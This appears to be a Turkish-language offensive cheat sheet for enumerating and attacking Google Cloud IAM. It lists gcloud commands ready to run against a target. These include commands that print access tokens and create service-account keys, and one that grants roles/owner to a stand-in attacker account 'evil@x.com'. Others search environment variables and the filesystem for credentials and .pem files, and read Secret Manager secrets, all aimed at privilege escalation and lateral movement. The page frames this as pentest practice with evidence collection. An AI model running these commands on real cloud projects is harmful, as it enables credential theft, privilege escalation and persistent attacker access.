Skip to content

GCP - IAM, Principals & Org Policies Enum

GCP enum

GCP - IAM, Principals & Org Policies Enum — GCP ortamında kaynak envanteri ve izin yüzeyi keşfi notudur. Amaç: çağıran kimliği netleştirmek, servise özel saldırı yüzeyini komutlarla doğrulamak ve kanıtlanabilir etki üretmek. Her fence tek komut/payload taşır; çıktıyı hedefe göre uyarla.

  1. Çağıran kimliği ve etkili izinleri netleştir.

  2. Servise özel kaynak envanteri çıkar (liste + describe).

  3. Secret, trust policy ve yazma yüzeyi adaylarını işaretle.

  4. Bir sonraki privesc / veri / RCE hipotezini kilitle.

Önce kim olduğunu ve hangi hesaba/projeye/kontekste oturduğunu kilitle.

Terminal window
gcloud auth list
Terminal window
gcloud config get-value project
Terminal window
gcloud auth print-access-token | cut -c1-20

GCP - IAM, Principals & Org Policies Enum için doğrudan uygulanabilir komutlar. Placeholder’ları (BUCKET, ROLE, FN, …) hedef değerlerle değiştir.

Terminal window
gcloud auth list
Terminal window
gcloud config list
Terminal window
gcloud projects list
Terminal window
gcloud projects get-iam-policy PROJECT
Terminal window
gcloud iam service-accounts list
Terminal window
gcloud iam service-accounts keys list --iam-account SA@PROJECT.iam.gserviceaccount.com
Terminal window
gcloud iam service-accounts keys create key.json --iam-account SA@PROJECT.iam.gserviceaccount.com
Terminal window
gcloud projects add-iam-policy-binding PROJECT --member='user:evil@x.com' --role='roles/owner'
Terminal window
gcloud iam roles list --project PROJECT
Terminal window
gcloud organizations get-iam-policy ORG

Env, metadata, secret store ve CI loglarından ikinci kimlik topla; yeni principal ile döngüyü tekrarla.

Terminal window
env | rg -i 'key|secret|token|password|aws_|azure|gcp|kube'
Terminal window
printenv | sort
Terminal window
find / -name '*.pem' -o -name 'credentials' -o -name '*.json' 2>/dev/null | head -n 40
Terminal window
gcloud secrets list
Terminal window
gcloud secrets versions access latest --secret=SECRET

Rapor için yeniden üretilebilir çıktı bırak: komut, zaman, hesap/arn, etki özeti.

request/response veya CLI çıktısı
hesap / proje / cluster
etki: okuma | yazma | RCE | lateral
zaman damgası + dosya hash
Terminal window
mkdir -p evidence/cloud && tee evidence/cloud/notes.txt